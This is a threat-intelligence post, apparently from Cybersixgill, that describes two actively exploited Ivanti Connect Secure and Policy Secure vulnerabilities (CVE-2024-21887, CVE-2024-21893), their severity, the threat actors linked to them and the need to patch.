Earlier this month, Cybersixgill detected reports regarding the exploitation of newly uncovered security vulnerabilities within Ivanti's offerings, specifically CVE-2024-21887 and CVE-2024-21893. These vulnerabilities are being actively exploited, with Cybersixgill uncovering proof-of-concept examples on GitHub. The security flaws in question impact Ivanti's Connect Secure VPN and Policy Secure network access control (NAC) devices, with reports indicating widespread exploitation of at least one of these vulnerabilities.
The vulnerabilities were initially disclosed in January 2024 and prompted Ivanti to release temporary mitigations. However, despite the mitigations, attackers were able to bypass defenses and continue exploiting the vulnerabilities.
Ivanti has confirmed that CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure and Ivanti Policy Secure. It allows an attacker to access certain restricted resources without authentication. Ivanti has also confirmed that CVE-2024-21887 is a command injection vulnerability in the web components of Ivanti Connect Secure and Ivanti Policy Secure. It allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the affected appliance. Both vulnerabilities have been acknowledged by Ivanti and mitigation measures have been provided.
Behind The Headline
CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA. This vulnerability allows an attacker to access certain restricted resources without authentication. The CVE has a DVE score of 9.12, indicating a high chance of exploitation. It is known to be related to APTs such as Volt Typhoon, QUILTED TIGER, Kimsuky, Killnet, and Sofacy.
The current CVSS score for CVE-2024-21893 is 8.2. It was reported on 10th February 2024 and is trending on Twitter, in the cyber Underground and on GitHub. It is also known to be exploited in the wild. Exploiting server-side request forgery vulnerabilities in the SAML component typically involves manipulating requests sent to the server to trick it into accessing restricted resources without proper authentication.
Threat actors may exploit this vulnerability by crafting malicious requests that exploit the server's trust in the SAML component. They could potentially bypass authentication mechanisms and gain unauthorized access to sensitive resources or perform actions on behalf of authenticated users.
Â
CVE-2024-21887 is a command injection vulnerability that affects Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. This vulnerability allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the affected appliance. It is important to note that when used in conjunction with CVE-2023-46805, exploitation does not require authentication, enabling a threat actor to craft malicious requests and execute arbitrary commands on the system.
Mitigation measures should be applied immediately to protect against CVE-2024-21887 and CVE-2023-46805. Ivanti has provided detailed instructions on their advisory site on how to apply the necessary mitigations. Patch releases are being launched in a staggered schedule, with the first version made available to customers the week of 22nd January and the final version the week of 19th February.
The current CVSS score for CVE-2024-21887 is 9.1, indicating a high severity level. This is due to being actively exploited by threat actors, indicating that it poses a real and immediate risk. Additionally, this type of vulnerability allows an attacker to execute arbitrary commands on the affected system, potentially leading to unauthorized access, data theft, or further compromise of the system.
Exploiting CVE-2024-21887 allows an authenticated administrator to execute arbitrary commands on the affected appliance. This can lead to complete control over the system, potentially resulting in unauthorized access, data manipulation, or disruption of services. Its connection with other vulnerabilities which, when combined, allow for exploitation without authentication significantly increases the potential for widespread attacks and further highlights the severity of the vulnerability.
The vulnerability is linked to several APT groups including RA Group, Rancoz, Rhysida, FIN11 and UAC-0050, indicating that it may be actively targeted by sophisticated threat actors with advanced capabilities. It is also worth mentioning that this vulnerability has a Proof of Concept (PoC) exploit and a Metasploit module available.
Exploitation in the wild
The active exploitation of both vulnerabilities suggests that threat actors have developed their own PoC exploits or have access to exploit code. It is crucial for users to apply patches and updates provided by Ivanti to protect their systems from these vulnerabilities, as the risk of exploitation is high.
The initial exploitation of these vulnerabilities has been attributed to Chinese state-sponsored threat actors. These threat actors have been linked to espionage activities and have targeted a wide range of industries.
The attackers have been using various techniques to exploit these vulnerabilities, including the installation of webshells and backdoors on compromised devices. They have also been able to bypass defenses and compromise device configuration files.
The number of compromised systems is believed to be significant, with reports indicating that thousands of Ivanti Connect Secure and Policy Secure VPN appliances have been affected. The compromised systems are spread across multiple countries.
Initially, Ivanti provided mitigations to address the vulnerabilities, but attackers were able to bypass these mitigations and continue their exploitation activities. This highlights the sophistication and persistence of the threat actors involved.
Â
Mitigating risk
To mitigate the risk of exploitation, it is crucial for organizations using affected versions of Ivanti products to apply the patches and updates provided by the vendor. These patches address the vulnerabilities and help protect against further exploitation. It is important to stay updated with the latest security advisories and follow the recommended mitigation steps provided by Ivanti and relevant cybersecurity agencies to protect against these vulnerabilities.